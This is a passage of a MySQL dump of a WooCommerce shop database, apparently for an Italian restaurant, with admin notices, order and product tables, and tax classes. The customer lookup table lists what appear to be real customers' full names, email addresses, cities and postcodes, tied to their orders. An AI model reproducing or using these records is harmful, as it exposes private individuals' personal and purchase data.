href=\"https://woocommerce.com/terms-conditions/woocommerce-payments-promotion/?utm_medium=notification&amp;utm_source=product&amp;utm_campaign=wcpay_exp20\" target=\"_blank\">Terms of Service</a>.</em>','info','{}','pending','woocommerce.com','2020-12-06 14:38:36',NULL,0,'plain','',0),(23,'wcpay-subscriptions-2020-12','marketing','en_US','Manage payments from your store\'s dashboard','Securely accept cards and manage transactions right from your dashboard with <a href=\"https://woocommerce.com/payments/?utm_medium=notification&amp;utm_source=product&amp;utm_campaign=wcpay_ctrl20\" target=\"_blank\">WooCommerce Payments</a>! Zero setup fees or monthly fees. Just pay-as-you-go, starting at just 2.9% + $0.30 per transaction for U.S.-issued cards. <br /><br /><em>By clicking \"Install now,\" you agree to our <a href=\"https://wordpress.com/tos/?utm_medium=notification&amp;utm_source=product&amp;utm_campaign=wcpay_ctrl20\" target=\"_blank\">Terms of Service</a>.</em>','info','{}','pending','woocommerce.com','2020-12-06 14:38:36',NULL,0,'plain','',0),(25,'wc-admin-new-sales-record','info','en_US','New sales record!','Woohoo, December 24th was your record day for sales! Net Sales was 500,00€ beating the previous record of 200,00€ set on December 23rd.','info','{\"old_record_date\":\"2020-12-23\",\"old_record_amt\":200,\"new_record_date\":\"2020-12-24\",\"new_record_amt\":500}','unactioned','woocommerce-admin','2020-12-25 09:35:38',NULL,0,'plain','',0),(26,'wc-admin-filter-by-product-variations-in-reports','info','en_US','New - filter by product variations in orders and products reports','One of the most awaited features has just arrived! You can now have insights into each product variation in the orders and products reports.','info','{}','unactioned','woocommerce-admin','2021-01-13 09:33:04',NULL,0,'banner','https://www.ristorantesolymar.it/wp-content/plugins/woocommerce/packages/woocommerce-admin/images/admin_notes/filter-by-product-variations-note.svg',0),(27,'your-first-product','info','en_US','Your first product','That\'s huge! You\'re well on your way to building a successful online store — now it’s time to think about how you\'ll fulfill your orders.<br /><br />Read our shipping guide to learn best practices and options for putting together your shipping strategy. And for WooCommerce stores in the United States, you can print discounted shipping labels via USPS with <a href=\"https://href.li/?https://woocommerce.com/shipping\" target=\"_blank\">WooCommerce Shipping</a>.','info','{}','pending','woocommerce.com','2021-01-22 17:34:40',NULL,0,'plain','',0),(28,'wc-admin-getting-started-in-ecommerce','info','en_US','Getting Started in eCommerce - webinar','We want to make eCommerce and this process of getting started as easy as possible for you. Watch this webinar to get tips on how to have our store up and running in a breeze.','info','{}','pending','woocommerce.com','2021-01-23 18:38:40',NULL,0,'plain','',0),(29,'wc-admin-performance-on-mobile','info','en_US','Monitora le prestazioni del negozio sul dispositivo mobile','Monitora le vendite e i prodotti dalle elevate prestazioni con l\'app Woo.','info','{}','unactioned','woocommerce-admin','2021-02-07 09:34:05',NULL,0,'plain','',0),(30,'wc-square-apple-pay-boost-sales','marketing','en_US','Boost sales with Apple Pay','Now that you accept Apple Pay® with Square you can increase conversion rates by letting your customers know that Apple Pay® is available. Here’s a marketing guide to help you get started.','info','{}','pending','woocommerce.com','2021-02-09 15:52:01',NULL,0,'plain','',0),(31,'wc-square-apple-pay-grow-your-business','marketing','en_US','Grow your business with Square and Apple Pay ','Now more than ever, shoppers want a fast, simple, and secure online checkout experience. Increase conversion rates by letting your customers know that you now accept Apple Pay®.','info','{}','pending','woocommerce.com','2021-02-09 15:52:01',NULL,0,'plain','',0),(32,'facebook_pixel_api_2021','marketing','en_US','Improve the performance of your Facebook ads','Enable Facebook Pixel and Conversions API through the latest version of Facebook for WooCommerce for improved performance and measurement of your Facebook ad campaigns.','info','{}','pending','woocommerce.com','2021-02-10 19:03:40',NULL,0,'plain','',0),(33,'facebook_ec_2021','marketing','en_US','Sync your product catalog with Facebook to help boost sales','A single click adds all products to your Facebook Business Page shop. Product changes are automatically synced, with the flexibility to control which products are listed.','info','{}','pending','woocommerce.com','2021-02-10 19:03:40',NULL,0,'plain','',0),(34,'wc-admin-optimizing-the-checkout-flow','info','en_US','Optimizing the checkout flow','It\'s crucial to get your store\'s checkout as smooth as possible to avoid losing sales. Let\'s take a look at how you can optimize the checkout experience for your shoppers.','info','{}','pending','woocommerce.com','2021-02-14 22:10:35',NULL,0,'plain','',0),(35,'wc-admin-first-five-things-to-customize','info','en_US','The first 5 things to customize in your store','Deciding what to start with first is tricky. To help you properly prioritize, we\'ve put together this short list of the first few things you should customize in WooCommerce.','info','{}','pending','woocommerce.com','2021-02-14 22:10:35',NULL,0,'plain','',0),(36,'wc-admin-effortless-payments-by-mollie','info','en_US','Effortless payments by Mollie','Offer global and local payment methods, get onboarded in minutes and supported in your language – try it now!','info','{}','pending','woocommerce.com','2021-02-19 15:49:18',NULL,0,'plain','',0),(37,'wcpay-apple-pay-boost-sales','marketing','en_US','Boost sales with Apple Pay','Now that you accept Apple Pay® with WooCommerce Payments you can increase conversion rates by letting your customers know that Apple Pay® is available. Here’s a marketing guide to help you get started.','info','{}','pending','woocommerce.com','2021-03-19 04:27:33',NULL,0,'plain','',0),(38,'wcpay-apple-pay-grow-your-business','marketing','en_US','Grow your business with WooCommerce Payments and Apple Pay','Now more than ever, shoppers want a fast, simple, and secure online checkout experience. Increase conversion rates by letting your customers know that you now accept Apple Pay®.','info','{}','pending','woocommerce.com','2021-03-19 04:27:33',NULL,0,'plain','',0),(39,'wcpay-apple-pay-is-now-available','marketing','en_US','Apple Pay is now available with WooCommerce Payments!','Increase your conversion rate by offering a fast and secure checkout with <a href=\"https://woocommerce.com/apple-pay/?utm_source=inbox&amp;utm_medium=product&amp;utm_campaign=wcpay_applepay\" target=\"_blank\">Apple Pay</a>®. It’s free to get started with <a href=\"https://woocommerce.com/payments/?utm_source=inbox&amp;utm_medium=product&amp;utm_campaign=wcpay_applepay\" target=\"_blank\">WooCommerce Payments</a>.','info','{}','pending','woocommerce.com','2021-03-29 19:49:53',NULL,0,'plain','',0),(40,'paypal_ppcp_gtm_2021','marketing','en_US','Offer more options with the new PayPal','Get the latest PayPal extension for a full suite of payment methods with extensive currency and country coverage.','info','{}','unactioned','woocommerce.com','2021-04-04 05:36:33',NULL,0,'plain','',0),(41,'wc-payments-qualitative-feedback','info','en_US','WooCommerce Payments setup - let us know what you think','Congrats on enabling WooCommerce Payments for your store. Please share your feedback in this 2 minute survey to help us improve the setup process.','info','{}','pending','woocommerce.com','2021-04-16 04:28:05',NULL,0,'plain','',0);
/*!40000 ALTER TABLE `wp_wc_admin_notes` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wc_category_lookup`
--

DROP TABLE IF EXISTS `wp_wc_category_lookup`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wc_category_lookup` (
  `category_tree_id` bigint(20) unsigned NOT NULL,
  `category_id` bigint(20) unsigned NOT NULL,
  PRIMARY KEY (`category_tree_id`,`category_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wc_category_lookup`
--

LOCK TABLES `wp_wc_category_lookup` WRITE;
/*!40000 ALTER TABLE `wp_wc_category_lookup` DISABLE KEYS */;
INSERT INTO `wp_wc_category_lookup` VALUES (7,7),(10,10),(11,11),(12,12),(13,13),(23,23),(25,25),(26,26),(27,27),(28,28),(62,62),(65,65),(66,66),(67,67),(68,68),(69,69);
/*!40000 ALTER TABLE `wp_wc_category_lookup` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wc_customer_lookup`
--

DROP TABLE IF EXISTS `wp_wc_customer_lookup`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wc_customer_lookup` (
  `customer_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) unsigned DEFAULT NULL,
  `username` varchar(60) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
  `first_name` varchar(255) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `last_name` varchar(255) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `email` varchar(100) COLLATE utf8mb4_unicode_520_ci DEFAULT NULL,
  `date_last_active` timestamp NULL DEFAULT NULL,
  `date_registered` timestamp NULL DEFAULT NULL,
  `country` char(2) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
  `postcode` varchar(20) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
  `city` varchar(100) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
  `state` varchar(100) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
  PRIMARY KEY (`customer_id`),
  UNIQUE KEY `user_id` (`user_id`),
  KEY `email` (`email`)
) ENGINE=MyISAM AUTO_INCREMENT=14 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wc_customer_lookup`
--

LOCK TABLES `wp_wc_customer_lookup` WRITE;
/*!40000 ALTER TABLE `wp_wc_customer_lookup` DISABLE KEYS */;
INSERT INTO `wp_wc_customer_lookup` VALUES (1,1,'magnaromagna','Franco','Baldisserri','webmaster@baldisserri.com','2021-01-31 05:00:00','2015-07-29 16:22:27','','','',''),(2,NULL,'','Antonella','Biagini','antonella.biagini@bahlsen.it','2020-06-05 20:19:42',NULL,'','','',''),(3,NULL,'','Adrian','Perini','adryperini@gmail.com','2020-02-11 23:20:22',NULL,'','','',''),(4,NULL,'','John marco','Coli','Johnmarcocoli@gmail.com','2020-02-11 16:40:12',NULL,'','','Rimimi',''),(5,NULL,'','Power-One Italy Spa','ABB','sabrina.cherici@it.abb.com','2019-10-31 16:31:18',NULL,'','','Terranuova Bracciolini (AR)',''),(6,NULL,'','Mattia','Bacchiani','mattiabacchiani@gmail.com','2019-12-23 20:46:48',NULL,'','','',''),(7,NULL,'','Gaia','Marchesini','gaia.marchesini@gmail.com','2020-08-04 17:02:35',NULL,'','','',''),(8,NULL,'','fran co','baldisserri','magnaromagna@gmail.com','2020-10-24 10:33:11',NULL,'IT','48027','solarolo','RN'),(9,NULL,'','Marcello','Manduchi','marcello.manduchi@hotmail.it','2020-10-26 00:00:04',NULL,'IT','47030','San Mauro Pascoli','FC'),(10,NULL,'','Raffaele','Biondi','raf.biondi@libero.it','2020-11-06 00:02:45',NULL,'IT','42122','Reggio emilia','RE'),(11,NULL,'','Matteo','Arlotti','arlostaff@gmail.com','2020-11-28 19:27:39',NULL,'IT','47921','Rimini','RN'),(12,NULL,'','Matteo','Sandri','matteo.sandri@bahlsen.it','2020-12-23 17:25:06',NULL,'IT','40135','Bologna','BO'),(13,NULL,'','Elena','Valentini','c.lorenzetti@inwind.it','2020-12-23 22:25:15',NULL,'IT','47838','Riccione','RN');
/*!40000 ALTER TABLE `wp_wc_customer_lookup` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wc_download_log`
--

DROP TABLE IF EXISTS `wp_wc_download_log`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wc_download_log` (
  `download_log_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `timestamp` datetime NOT NULL,
  `permission_id` bigint(20) unsigned NOT NULL,
  `user_id` bigint(20) unsigned DEFAULT NULL,
  `user_ip_address` varchar(100) COLLATE utf8mb4_unicode_520_ci DEFAULT '',
  PRIMARY KEY (`download_log_id`),
  KEY `permission_id` (`permission_id`),
  KEY `timestamp` (`timestamp`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wc_download_log`
--

LOCK TABLES `wp_wc_download_log` WRITE;
/*!40000 ALTER TABLE `wp_wc_download_log` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wc_download_log` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wc_order_coupon_lookup`
--

DROP TABLE IF EXISTS `wp_wc_order_coupon_lookup`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wc_order_coupon_lookup` (
  `order_id` bigint(20) unsigned NOT NULL,
  `coupon_id` bigint(20) NOT NULL,
  `date_created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `discount_amount` double NOT NULL DEFAULT '0',
  PRIMARY KEY (`order_id`,`coupon_id`),
  KEY `coupon_id` (`coupon_id`),
  KEY `date_created` (`date_created`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wc_order_coupon_lookup`
--

LOCK TABLES `wp_wc_order_coupon_lookup` WRITE;
/*!40000 ALTER TABLE `wp_wc_order_coupon_lookup` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wc_order_coupon_lookup` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wc_order_product_lookup`
--

DROP TABLE IF EXISTS `wp_wc_order_product_lookup`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wc_order_product_lookup` (
  `order_item_id` bigint(20) unsigned NOT NULL,
  `order_id` bigint(20) unsigned NOT NULL,
  `product_id` bigint(20) unsigned NOT NULL,
  `variation_id` bigint(20) unsigned NOT NULL,
  `customer_id` bigint(20) unsigned DEFAULT NULL,
  `date_created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `product_qty` int(11) NOT NULL,
  `product_net_revenue` double NOT NULL DEFAULT '0',
  `product_gross_revenue` double NOT NULL DEFAULT '0',
  `coupon_amount` double NOT NULL DEFAULT '0',
  `tax_amount` double NOT NULL DEFAULT '0',
  `shipping_amount` double NOT NULL DEFAULT '0',
  `shipping_tax_amount` double NOT NULL DEFAULT '0',
  PRIMARY KEY (`order_item_id`),
  KEY `order_id` (`order_id`),
  KEY `product_id` (`product_id`),
  KEY `customer_id` (`customer_id`),
  KEY `date_created` (`date_created`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wc_order_product_lookup`
--

LOCK TABLES `wp_wc_order_product_lookup` WRITE;
/*!40000 ALTER TABLE `wp_wc_order_product_lookup` DISABLE KEYS */;
INSERT INTO `wp_wc_order_product_lookup` VALUES (334,896,875,880,5,'2019-10-31 13:31:18',3,360,360,0,0,0,0),(335,896,875,878,5,'2019-10-31 13:31:18',1,90,90,0,0,0,0),(355,929,875,881,6,'2019-12-23 16:46:48',1,30,30,0,0,0,0),(357,931,875,881,6,'2019-12-23 17:07:13',1,30,30,0,0,0,0),(372,959,288,0,4,'2020-02-11 12:40:12',1,30,30,0,0,0,0),(376,963,288,0,3,'2020-02-11 19:20:22',1,30,30,0,0,0,0),(377,967,548,0,2,'2020-06-05 18:19:42',1,100,100,0,0,0,0),(378,1051,472,0,7,'2020-08-04 15:02:35',1,125,125,0,0,0,0),(379,1124,435,0,1,'2020-10-19 13:46:47',1,100,100,0,0,0,0),(380,1127,472,0,8,'2020-10-24 08:33:11',1,125,125,0,0,0,0),(381,1141,548,0,9,'2020-10-25 21:00:04',1,100,100,0,0,0,0),(382,1222,875,881,10,'2020-11-05 20:02:45',1,30,30,0,0,0,0),(383,1257,548,0,11,'2020-11-28 15:27:39',1,58,58,0,0,0,0),(384,3677,548,0,12,'2020-12-23 13:25:06',1,100,100,0,0,0,0),(385,3678,548,0,13,'2020-12-23 18:25:15',1,100,100,0,0,0,0),(386,3679,548,0,12,'2020-12-24 12:25:41',1,100,100,0,0,0,0),(387,3679,548,0,12,'2020-12-24 12:25:41',1,100,100,0,0,0,0),(388,3686,548,0,13,'2020-12-24 15:28:59',1,100,100,0,0,0,0),(389,3686,548,0,13,'2020-12-24 15:28:59',1,100,100,0,0,0,0),(390,3687,548,0,13,'2020-12-24 15:29:43',1,100,100,0,0,0,0);
/*!40000 ALTER TABLE `wp_wc_order_product_lookup` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wc_order_stats`
--

DROP TABLE IF EXISTS `wp_wc_order_stats`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wc_order_stats` (
  `order_id` bigint(20) unsigned NOT NULL,
  `parent_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  `date_created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `date_created_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `num_items_sold` int(11) NOT NULL DEFAULT '0',
  `total_sales` double NOT NULL DEFAULT '0',
  `tax_total` double NOT NULL DEFAULT '0',
  `shipping_total` double NOT NULL DEFAULT '0',
  `net_total` double NOT NULL DEFAULT '0',
  `returning_customer` tinyint(1) DEFAULT NULL,
  `status` varchar(200) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `customer_id` bigint(20) unsigned NOT NULL,
  PRIMARY KEY (`order_id`),
  KEY `date_created` (`date_created`),
  KEY `customer_id` (`customer_id`),
  KEY `status` (`status`(191))
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wc_order_stats`
--

LOCK TABLES `wp_wc_order_stats` WRITE;
/*!40000 ALTER TABLE `wp_wc_order_stats` DISABLE KEYS */;
INSERT INTO `wp_wc_order_stats` VALUES (896,0,'2019-10-31 13:31:18','2019-10-31 12:31:18',4,450,0,0,450,0,'wc-cancelled',5),(929,0,'2019-12-23 16:46:48','2019-12-23 15:46:48',1,30,0,0,30,0,'wc-cancelled',6),(931,0,'2019-12-23 17:07:13','2019-12-23 16:07:13',1,30,0,0,30,0,'wc-cancelled',6),(959,0,'2020-02-11 12:40:12','2020-02-11 11:40:12',1,30,0,0,30,0,'wc-cancelled',4),(963,0,'2020-02-11 19:20:22','2020-02-11 18:20:22',1,30,0,0,30,0,'wc-cancelled',3),(967,0,'2020-06-05 18:19:42','2020-06-05 16:19:42',1,100,0,0,100,0,'wc-processing',2),(1051,0,'2020-08-04 15:02:35','2020-08-04 13:02:35',1,125,0,0,125,0,'wc-processing',7),(1124,0,'2020-10-19 13:46:47','2020-10-19 11:46:47',1,100,0,0,100,0,'wc-cancelled',1),(1127,0,'2020-10-24 08:33:11','2020-10-24 06:33:11',1,125,0,0,125,0,'wc-cancelled',8),(1141,0,'2020-10-25 21:00:04','2020-10-25 20:00:04',1,100,0,0,100,0,'wc-processing',9),(1222,0,'2020-11-05 20:02:45','2020-11-05 19:02:45',1,30,0,0,30,0,'wc-processing',10),(1257,0,'2020-11-28 15:27:39','2020-11-28 14:27:39',1,58,0,0,58,0,'wc-processing',11),(3677,0,'2020-12-23 13:25:06','2020-12-23 12:25:06',1,100,0,0,100,0,'wc-cancelled',12),(3678,0,'2020-12-23 18:25:15','2020-12-23 17:25:15',1,100,0,0,100,0,'wc-cancelled',13),(3679,0,'2020-12-24 12:25:41','2020-12-24 11:25:41',2,200,0,0,200,0,'wc-processing',12),(3686,0,'2020-12-24 15:28:59','2020-12-24 14:28:59',2,200,0,0,200,1,'wc-cancelled',13),(3687,0,'2020-12-24 15:29:43','2020-12-24 14:29:43',1,100,0,0,100,0,'wc-processing',13);
/*!40000 ALTER TABLE `wp_wc_order_stats` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wc_order_tax_lookup`
--

DROP TABLE IF EXISTS `wp_wc_order_tax_lookup`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wc_order_tax_lookup` (
  `order_id` bigint(20) unsigned NOT NULL,
  `tax_rate_id` bigint(20) unsigned NOT NULL,
  `date_created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `shipping_tax` double NOT NULL DEFAULT '0',
  `order_tax` double NOT NULL DEFAULT '0',
  `total_tax` double NOT NULL DEFAULT '0',
  PRIMARY KEY (`order_id`,`tax_rate_id`),
  KEY `tax_rate_id` (`tax_rate_id`),
  KEY `date_created` (`date_created`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wc_order_tax_lookup`
--

LOCK TABLES `wp_wc_order_tax_lookup` WRITE;
/*!40000 ALTER TABLE `wp_wc_order_tax_lookup` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wc_order_tax_lookup` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wc_product_meta_lookup`
--

DROP TABLE IF EXISTS `wp_wc_product_meta_lookup`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wc_product_meta_lookup` (
  `product_id` bigint(20) NOT NULL,
  `sku` varchar(100) COLLATE utf8mb4_unicode_520_ci DEFAULT '',
  `virtual` tinyint(1) DEFAULT '0',
  `downloadable` tinyint(1) DEFAULT '0',
  `min_price` decimal(19,4) DEFAULT NULL,
  `max_price` decimal(19,4) DEFAULT NULL,
  `onsale` tinyint(1) DEFAULT '0',
  `stock_quantity` double DEFAULT NULL,
  `stock_status` varchar(100) COLLATE utf8mb4_unicode_520_ci DEFAULT 'instock',
  `rating_count` bigint(20) DEFAULT '0',
  `average_rating` decimal(3,2) DEFAULT '0.00',
  `total_sales` bigint(20) DEFAULT '0',
  `tax_status` varchar(100) COLLATE utf8mb4_unicode_520_ci DEFAULT 'taxable',
  `tax_class` varchar(100) COLLATE utf8mb4_unicode_520_ci DEFAULT '',
  PRIMARY KEY (`product_id`),
  KEY `virtual` (`virtual`),
  KEY `downloadable` (`downloadable`),
  KEY `stock_status` (`stock_status`),
  KEY `stock_quantity` (`stock_quantity`),
  KEY `onsale` (`onsale`),
  KEY `min_max_price` (`min_price`,`max_price`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wc_product_meta_lookup`
--

LOCK TABLES `wp_wc_product_meta_lookup` WRITE;
/*!40000 ALTER TABLE `wp_wc_product_meta_lookup` DISABLE KEYS */;
INSERT INTO `wp_wc_product_meta_lookup` VALUES (211,'tavolox2',0,0,60.0000,60.0000,0,1,'outofstock',0,0.00,26,'taxable',''),(213,'tavolox3',0,0,90.0000,90.0000,0,0,'outofstock',0,0.00,3,'taxable',''),(216,'tavolox4',0,0,120.0000,120.0000,0,0,'outofstock',0,0.00,12,'taxable',''),(220,'tavolox6',0,0,180.0000,180.0000,0,0,'outofstock',0,0.00,7,'taxable',''),(244,'tavolox5',0,0,150.0000,150.0000,0,0,'outofstock',0,0.00,2,'taxable',''),(288,'sanvalentino-tavolox2',0,0,30.0000,30.0000,0,0,'outofstock',0,0.00,61,'taxable',''),(290,'sanvalentino-tavolox4',0,0,60.0000,60.0000,0,0,'outofstock',0,0.00,2,'taxable',''),(322,'pasqua-2pax',0,0,60.0000,60.0000,0,0,'outofstock',0,0.00,17,'taxable',''),(323,'pasqua-3pax',0,0,90.0000,90.0000,0,0,'outofstock',0,0.00,5,'taxable',''),(324,'pasqua-4pax',0,0,120.0000,120.0000,0,0,'outofstock',0,0.00,13,'taxable',''),(325,'pasqua-5pax',0,0,150.0000,150.0000,0,0,'outofstock',0,0.00,2,'taxable',''),(327,'pasquetta-2pax',0,0,60.0000,60.0000,0,1,'instock',0,0.00,21,'taxable',''),(328,'pasquetta-3pax',0,0,90.0000,90.0000,0,0,'outofstock',0,0.00,4,'taxable',''),(329,'pasquetta-4pax',0,0,120.0000,120.0000,0,2,'instock',0,0.00,9,'taxable',''),(331,'pasquetta-6pax',0,0,180.0000,180.0000,0,1,'instock',0,0.00,6,'taxable',''),(333,'pasqua-7pax',0,0,210.0000,210.0000,0,0,'outofstock',0,0.00,1,'taxable',''),(334,'pasquetta-8pax',0,0,240.0000,240.0000,0,0,'outofstock',0,0.00,1,'taxable',''),(337,'pasquetta-5pax',0,0,150.0000,150.0000,0,0,'outofstock',0,0.00,5,'taxable',''),(435,'regalacena-creativo',0,0,100.0000,100.0000,0,NULL,'instock',0,0.00,6,'taxable',''),(472,'regalacena-creativo-con-bevande',0,0,125.0000,125.0000,0,NULL,'instock',0,0.00,15,'taxable',''),(474,'regalacena-storico',0,0,93.0000,93.0000,0,NULL,'instock',0,0.00,2,'taxable',''),(475,'gift-card-50',0,0,115.0000,115.0000,0,NULL,'instock',0,0.00,9,'taxable',''),(482,'acquisto-cena-menu-creativo',1,0,98.0000,98.0000,0,NULL,'outofstock',0,0.00,0,'taxable',''),(483,'acquisto-cena-menu-creativo-con-bevande',1,0,120.0000,120.0000,0,NULL,'outofstock',0,0.00,0,'taxable',''),(484,'acquisto-cena-menu-storico',1,0,90.0000,90.0000,0,NULL,'outofstock',0,0.00,0,'taxable',''),(485,'acquisto-cena-menu-storico-con-bevande',1,0,115.0000,115.0000,0,NULL,'outofstock',0,0.00,0,'taxable',''),(548,'coupon',0,0,25.0000,25.0000,0,NULL,'instock',0,0.00,50,'taxable',''),(630,'pasqua-6pax',0,0,180.0000,180.0000,0,0,'outofstock',0,0.00,3,'taxable',''),(631,'pasqua-8pax',0,0,240.0000,240.0000,0,0,'outofstock',0,0.00,1,'taxable',''),(633,'pasquetta-7pax',0,0,210.0000,210.0000,0,1,'instock',0,0.00,0,'taxable',''),(875,'caparra',0,0,30.0000,120.0000,0,NULL,'instock',0,0.00,30,'taxable',''),(876,'caparrax4',0,0,60.0000,60.0000,0,NULL,'instock',0,0.00,0,'taxable','parent'),(877,'caparrax5',0,0,75.0000,75.0000,0,NULL,'instock',0,0.00,0,'taxable','parent'),(878,'caparrax6',0,0,90.0000,90.0000,0,NULL,'instock',0,0.00,0,'taxable','parent'),(879,'caparrax7',0,0,105.0000,105.0000,0,NULL,'instock',0,0.00,0,'taxable','parent'),(880,'caparrax8',0,0,120.0000,120.0000,0,NULL,'instock',0,0.00,0,'taxable','parent'),(881,'caparrax2',0,0,30.0000,30.0000,0,NULL,'instock',0,0.00,0,'taxable','parent'),(882,'caparrax3',0,0,45.0000,45.0000,0,NULL,'instock',0,0.00,0,'taxable','parent');
/*!40000 ALTER TABLE `wp_wc_product_meta_lookup` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wc_reserved_stock`
--

DROP TABLE IF EXISTS `wp_wc_reserved_stock`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wc_reserved_stock` (
  `order_id` bigint(20) NOT NULL,
  `product_id` bigint(20) NOT NULL,
  `stock_quantity` double NOT NULL DEFAULT '0',
  `timestamp` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `expires` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  PRIMARY KEY (`order_id`,`product_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wc_reserved_stock`
--

LOCK TABLES `wp_wc_reserved_stock` WRITE;
/*!40000 ALTER TABLE `wp_wc_reserved_stock` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wc_reserved_stock` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wc_tax_rate_classes`
--

DROP TABLE IF EXISTS `wp_wc_tax_rate_classes`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wc_tax_rate_classes` (
  `tax_rate_class_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `name` varchar(200) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
  `slug` varchar(200) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
  PRIMARY KEY (`tax_rate_class_id`),
  UNIQUE KEY `slug` (`slug`(191))
) ENGINE=MyISAM AUTO_INCREMENT=5 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wc_tax_rate_classes`
--

LOCK TABLES `wp_wc_tax_rate_classes` WRITE;
/*!40000 ALTER TABLE `wp_wc_tax_rate_classes` DISABLE KEYS */;
INSERT INTO `wp_wc_tax_rate_classes` VALUES (1,'Tariffa ridotta','tariffa-ridotta'),(2,'Nessuna tariffa','nessuna-tariffa'),(3,'Reduced Rate','reduced-rate'),(4,'Zero Rate','zero-rate');
/*!40000 ALTER TABLE `wp_wc_tax_rate_classes` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wc_webhooks`
--

DROP TABLE IF EXISTS `wp_wc_webhooks`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wc_webhooks` (
  `webhook_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `status` varchar(200) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `name` text COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `user_id` bigint(20) unsigned NOT NULL,
  `delivery_url` text COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `secret` text COLLATE utf8mb4_unicode_520_ci NOT NULL,
